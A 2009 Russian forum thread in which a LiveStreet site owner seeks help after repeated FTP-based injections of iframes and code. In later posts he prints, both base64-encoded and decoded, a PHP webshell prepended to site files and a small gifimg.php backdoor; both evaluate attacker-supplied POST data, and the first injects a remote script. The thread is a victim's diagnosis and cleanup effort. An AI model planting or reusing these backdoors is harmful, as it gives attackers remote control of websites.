Постоянно ломают сайт

Кто нибудь знает реально действенный метод борьбы с iframe. Ну задолбали уже честное слово. В последнее время поменял пароли на фтп, поставил права на все файлы index, config, main, на сайте в 444, на компе стоит лицензионный KIS 2010, работаю с сайтом преимущественно из под ubuntu. Но вот недавно буквально на 5 минут изменил права index."*" и config."*" на 644 чтобы поставить модуль статистики avadim'a и сразу же за эти 5 минут напихали во все индексные файлы iframe. Они постоянно что ли проверяют можно ли мне нагадить или как? Пароли ни в браузерах ни в фтп клиентах не сохраняю. Как противостоять этим пидорам люди? Помогите побороть пожалуйста. Хостинг hc.ru. Спасибо.

31 комментарий

avatar
а смотел сам сайт на предмет наличия эксплойтов и прочей гадости?
  • skif
  • 0
avatar
Подскажи пожалуйста как и чем проверить.
avatar
поспрашивай у гугла… найдется много тем вроде этой
http://forum.antichat.ru/printthread.php?t=122062&pp=40

и там уже смотри что тебе больше подойдет. Я вообще не большой спец по этой части.
avatar
проси логи у хостера ???
avatar
Если пароли на фтп юзаешь только со своего компа, то ищи заразу на своем компе.
avatar
Постоянно сканирую весь комп KIS 2010, может он не все находит? Логи фтп доступа посмотрел, особо ничего подозрительного не увидел, разве только вот это:
88.198.64.245 - - [08/Oct/2009:16:08:24 +0400] "GET /upload/market.php HTTP/1.0"
 404 1342 "http://stenos.ru/index.php?p=29&id=66bcd0c8b2f32a50ad2aa8ea7249c15c" 
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR
 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1)"

Не понял что за запрос такой и сам сайт stenos.ru тоже какой то подозрительный.
Пока буду врубать защиту по IP с использованием .ftpaccess,
avatar
Вот сейчас скачал файл доступа ftp.ptzonline.ru-ftp_log. Вот что в нем написано:

Thu Oct 08 12:46:24 2009 0 79.117.67.131 3947 /---/public_html/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:46:35 2009 0 77.20.237.248 1004 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:46:43 2009 1 80.56.234.225 7211 /---/public_html/classes/lib/external/Zloy_Taburet/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:46:50 2009 0 80.6.127.97 985 /---/public_html/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:09 2009 0 89.45.47.39 2387 /---/public_html/ga/main.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:17 2009 0 86.52.60.16 625 /---/public_html/ga/docs/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:27 2009 0 95.171.4.249 1016 /---/public_html/map/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:32 2009 0 89.176.209.3 3947 /---/public_html/multiblog.ru/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:39 2009 0 188.26.198.100 2441 /---/public_html/multiblog.ru/_mju/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:47:51 2009 0 85.222.104.247 1004 /---/public_html/multiblog.ru/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 12:48:06 2009 0 94.113.23.136 985 /---/public_html/multiblog.ru/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:07 2009 0 89.235.248.184 3947 /---/public_html/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:19 2009 0 82.139.37.53 1004 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:28 2009 0 84.3.145.236 7211 /---/public_html/classes/lib/external/Zloy_Taburet/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:37 2009 0 78.137.6.17 985 /---/public_html/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:43 2009 0 82.210.184.159 2387 /---/public_html/ga/main.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:02:52 2009 0 89.46.13.11 625 /---/public_html/ga/docs/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:03:01 2009 0 78.99.54.136 1016 /---/public_html/map/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:03:10 2009 0 85.29.214.18 3947 /---/public_html/multiblog.ru/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:03:16 2009 0 79.112.227.253 2441 /---/public_html/multiblog.ru/_mju/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:03:34 2009 0 94.74.74.120 1004 /---/public_html/multiblog.ru/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 13:03:46 2009 0 85.29.194.99 985 /---/public_html/multiblog.ru/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:48:04 2009 0 83.230.34.60 3947 /---/public_html/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:48:22 2009 0 79.165.83.37 883 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:48:26 2009 0 84.192.147.58 1003 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ i r ptzonlin ftp 1 * c
Thu Oct 08 19:48:28 2009 0 82.115.92.213 7297 /---/public_html/classes/lib/external/Zloy_Taburet/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:48:34 2009 0 84.195.140.91 887 /---/public_html/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:01 2009 0 78.139.59.76 2387 /---/public_html/ga/main.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:07 2009 0 79.116.196.1 498 /---/public_html/ga/docs/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:20 2009 0 84.105.232.87 890 /---/public_html/map/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:32 2009 0 213.245.19.120 3947 /---/public_html/multiblog.ru/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:38 2009 0 82.34.2.233 2782 /---/public_html/multiblog.ru/_mju/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:49:54 2009 0 87.206.225.230 883 /---/public_html/multiblog.ru/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 19:50:06 2009 0 83.230.10.20 887 /---/public_html/multiblog.ru/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:33:52 2009 0 89.134.242.124 3947 /---/public_html/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:34:07 2009 0 79.116.139.200 1003 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:34:18 2009 0 89.132.115.53 1122 /---/public_html/classes/lib/external/Smarty-2.6.19/demo/index.php a _ i r ptzonlin ftp 1 * c
Thu Oct 08 20:34:22 2009 0 85.219.182.241 7297 /---/public_html/classes/lib/external/Zloy_Taburet/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:34:33 2009 0 217.172.249.241 887 /---/public_html/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:34:43 2009 0 86.107.218.150 2387 /---/public_html/ga/main.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:34:57 2009 0 89.176.103.46 498 /---/public_html/ga/docs/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:35:08 2009 0 94.113.155.25 890 /---/public_html/map/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:35:19 2009 0 89.78.181.65 3947 /---/public_html/multiblog.ru/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:35:34 2009 0 62.201.110.30 2782 /---/public_html/multiblog.ru/_mju/index.html a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:35:44 2009 0 89.133.131.213 883 /---/public_html/multiblog.ru/classes/lib/external/Smarty-2.6.19/demo/index.php a _ o r ptzonlin ftp 1 * c
Thu Oct 08 20:36:00 2009 0 94.21.242.152 887 /---/public_html/multiblog.ru/classes/lib/external/kcaptcha/index.php a _ o r ptzonlin ftp 1 * c

Что все это значит народ? Смею заметить, что моего IP среди этих нету. IP у меня не динамический, т.к. выхожу с городской локальной сети. И обращения идут только к index.php, index.html и main.php
avatar
Я склоняюсь к тому что у вас на копме какае то зараза, у меня было подобное в прошлом году, все свои сайты закидал этими фреймами, даже ставил защиту по htaccess но всеравно появлялись после того как я сам лично входил в админку или на фтп.
Так что проверь как следует комп на наличие вирусов и троянов, а после и сервер пошерсти. Бывали случаи что и из-за дырявого хостинга подобное бывало на всех сайта одного сервера.
avatar
на фтп через тотал заходишь?
у раннего тотала была уязвимость стягивания сохраненных паролей, ща вроде исправились
avatar
Тут неплохо описывается такая уязвимость и как с ней бороться.
  • haZe
  • 0
avatar
Разреши доступ к ФТП только со своего IP.
avatar
У меня в логах на hc.ru, кстати, тоже висит этот подозрительный stenos.ru, что очень странно. Заходил на этот сайт, там все закрыто авторизацией. Нашел в гугле еще вот такую тему. Возможно парсят вообще все сайты на предмет своровать хоть что-то.

Кстати, yuri25, как у тебя с регистрглобалс? ;-)
  • Carw
  • 0
avatar
register_globals Off
avatar
хм… тогда действительно пароли пропадают видимо на этапе между вводом и работой. Другие варианты представить сложно.
avatar
Интересно, что за умник прошелся по комментам и отминусовал их? Это отношение к проблеме (типа «ой, какой ужас!») или к сути комментов?
avatar
не удержался и посмотрел, т.к. признаки троллинга на лицо
это livestreet.ru/profile/vist/
avatar
Хмм… видимо надо потребовать от vist-а гласного ответа за содеянное :-)

vist? :-)
avatar
А смысл? Пусть минусует, если ему так хочется. Минусы ведь на то и придумали, чтобы на них нажимать.

Но с другой стороны, не каждый может стойко перенести молчаливое минусование. Многие расстраиваются, просят прокомментировать отрицательные оценки. Я часто такое наблюдаю и глубоко убеждён, что повода к печали нет, когда в интернете кто-то неправ.
avatar
Да, есть такое. Но меня здесь скорее не минусы, а мотивация интересует. Есть ли какая-то связь между этими минусами и обсуждаемой темой?
avatar
Даже между твоими словами и обсуждаемой темой уже нет никакой взаимосвязи.
Это я к тому, что тема-то важная, а тут, вместо ее обсуждения, кормление тролля идет. Меньше внимания стоит обращать на них. Тролли без внимания хиреют.
avatar
Давайте рубить уже эту ветку, действительно не на то внимание обращаем. Хотя в целом тут уже надо больше yuri25 копать. Варианты мы ему разные предложили.
avatar
Да, всем спасибо ребята. Пароли поменял, комп проверил (антивирус ничего не нашел), поставил ограничение на фтп по IP. Буду смотреть как дальше будет. Всем спасибо за отзывы и советы.
avatar
Возможно кто-то знает о чем речь и не хочет тему ворошить? :-)

Провел посильную деминусацию :-)
avatar
Рано я успокоился… Или у хостера что то случилось или меня конкретно ломают. Права на файлы index и config кто то поменял на 755, и везде вверху файлов напихано вот это:

<?php eval(base64_decode('aWYoIWlzc2V0KCR1bWwxKSl7ZnVuY3Rpb24gdW1sKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/
KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk
+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZW
dfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJi
YoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykp
KSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPV
tcJyJdPyhodHRwOik/Ly8oW14+XSo/T4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnL
CRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMmx
1ZEhSdmIyeHpMbkoxTDJsdFp5OXpkV0p6WTNKcFltVXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdW1sMigkYSwkYiwkYywkZCl7Z2xvYmFsICR1bWwxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR1bWwxKSljYWxsX3VzZXJfZnVuYygkdW1sMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1bWwnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnd
W1sJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHVtbGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3VtbDInKSkhPSd1bWwyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
/*-------------------------------------------------------
*
*   LiveStreet Engine Social Networking
*   Copyright © 2008 Mzhelskiy Maxim
*
*--------------------------------------------------------
*
*   Official site: www.livestreet.ru
*   Contact e-mail: rus.engine@gmail.com
*
*   GNU General Public License, version 2:
*   http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
*

Причем такое напихано и в другие файлы, например в classes/modules/sys_database/Database.class.php

Люди как думаете что это за хрень? Может все таки глюк у хостера? Слишком уж много всего поменялось, да и нафик меня кому то взламывать… было бы что ломать:(. Устал я, наверное придется менять hc.ru
Если ломанули то получается что и блокировка по IP не сработала, х.з. не знаю что уже и думать. Посоветуйте что нибудь пожалуйста.
avatar
Да уж, ты везунчик. Может это уже все появилось до смены паролей? Надо попробовать вычистить действительно все. Потому как эта штука свободно может при каждом запуске рассовывать себя в разные файлы.
avatar
Это шелл, закодированный base64… вообще чтобы наверняка избавиться от этой заразы нужно удалить все с хостинга и залить новый дистрибутив. Можно конечно и с блокнотом сидеть методично вычищать, тоже вариант.

Скорее всего взламывать никому не понадобилось, школота нашла дыру, решила залить шелл на будущее… и так поприкалываться.
avatar
Если стоит блокировка на фтп по IP, то одно из двух — либо троян сидит на твоем компе и не вылавливается антивирусником, либо есть какая-то дыра у хостера. Теоретически возможен, конечно, и третий вариант — никому пока не известная дыра в самом ЛС. Но раз таких проблем больше ни у кого нет, то вряд ли.

Я бы так сделал:
1) меняю фтп-пароль
2) чищу index.php (другие можно не трогать)
3) через какое-то время считываю фтп-логи и проверяю — есть зараза?
Выполняю последовательно все эти три шага сначала на родном компе, потом на другом (при возможности — еще и на третьем). И самое главное — пока выполняются все три пункта на одном компе, ни в коем случае не выходить на сайт по фтп с какого-то другого компа.

Затем сравниваю результаты. Если, например, при работе с моего компа зараза появляется, а при работе с других — нет, то все ясно — троян на конкретной машине, и Касперский — мастдай.

Возможно, все дело закончится сменой пароля. Это будет означать, что твой пароль давно уплыл налево и юзается ботами для внесения инфекции в индексные файлы.

Если окажется, что меняя пароли на разных машинах, и не видя в логах несанкционированного доступа по фтп, все равно засечешь изменения файлов, то искать проблему надо внутри. Сначала скурпулезно пройтись абсолютно по всем файлам и все вычистить (если сайт молодой, то проще, наверное, будет убить его и заново залить) — зараза может быть самовоспроизводящейся. А потом уже — рвать на себе тельник и наезжать на хостера. Или попросту съежать.
avatar
Да, шелл долбаный… Попробовал раскодировать, получилось что то такое:

if(!isset($uml1)){function uml($s){if(preg_match_all('##is',$s,$a))foreach($a[0]
 as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]
{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&
($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace
($v,'',$s);}if(preg_match_all('##is','',$s);$s=str_replace($a=base64_decode
('PHNjcmlwdCBzcmM9aHR0cDovL2ludHRvb2xzLnJ1L2ltZy9zdWJzY3JpYmUucGhwID48L3NjcmlwdD4='),
'',$s);if(stristr($s,'=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start
('uml');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$umll=
(($a=@set_error_handler('uml2'))!='uml2')?$a:0;eval(base64_decode($_POST['e']));


Буду чистить и думать что делать дальше. Avadim, а подскажи если я буду работать с сайтом только из под Linux, а из windows просто выходить в сеть — этим можно исключить свой компьютер на заразу или нет?
avatar
Жаль слабо разбираюсь в вопросах безопасности, но продолжаю копать, вдруг информация окажется полезной. Обнаружил файлы с таким именем gifimg.php в папках templates/skin/new/images, templates/skin/g6h/images, templates/skin/developer/images, uploads/images Содержимое файла такое:
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZG
llKCc0MDQgTm90IEZvdW5kJyk7'));?>

Вывод через echo (base64_decode(....) показал это:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');


Насколько я понял этот файл и есть шелл, но как и кто его закинул туда? Конечно могли и пароли стырить. Посмотрел логи фтп, там естественно несколько строк с обращением именно к этому файлу, например:

Tue Oct 13 01:08:46 2009 0 67.210.109.185 141 /home/ptzonlin/public_html/templates/skin/developer/images/gifimg.php a _ i r ptzonlin ftp 1 * c
Tue Oct 13 01:08:46 2009 0 67.210.109.185 141 /home/ptzonlin/public_html/templates/skin/developer/images/gifimg.php a _ i r ptzonlin ftp 1 * c
Tue Oct 13 01:09:37 2009 0 67.210.109.185 141 /home/ptzonlin/public_html/templates/skin/g6h/images/gifimg.php a _ i r ptzonlin ftp 1 * c
Tue Oct 13 01:13:45 2009 0 67.210.109.185 141 /home/ptzonlin/public_html/uploads/images/gifimg.php a _ i r ptzonlin ftp 1 * c

Также в логах куча обращений к другим файлам, например:
Tue Oct 13 01:14:02 2009 0 67.210.109.185 188 /home/ptzonlin/public_html/.htaccess a _ o r ptzonlin ftp 1 * c

Я так толком и не понял, что означают эти записи, наверное то что кто то с IP адреса 67.210.109.185 имеет доступ по фтп к файлам также как и я, ибо знает логин и пароль.
По этому IP в браузере открывается сайт
http://www.lunarpages.com/ 
насколько я понял сайт какого то забугорного хостинга. Вот такие дела ребята:( Если кто разбирается в логах и вообще в вопросах безопасности буду очень благодарен если поможет мне разобраться с логами. Может моя ошибка была в том, что я закинул ftpaccess в папку public_html, а нужно было в корень аккаунта? И еще такой вопрос, если я запретил доступ с других IP кроме своего, то в логах и не должно быть вообще других IP кроме моего так? Я прошу прощения что продолжаю ветку, но вдруг инфа пригодится еще когда нибудь, ну и так для общего развития. Так что прошу не считать за флуд.
avatar
Торянов под Линукс на порядок (а, может, и на два) меньше, чем под Виндами, но они существуют. И неизвестно, с какой ОС была инфекция (если она была от тебя).

Про gifimg.php — это широкие ворота для входа на твой сайт. Можно передавать любые команды и они будут выполняться. Варианты, как зараза могла попасть на сайт — читай выше. И пока не вычистишь абсолютно ВСЕ файлы, она будет жить и распространяться. Кстати, не забывай о регулярном дампе БД, а сразу после очистки первым делом меняй пароли к ней.
комментарий был удален
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.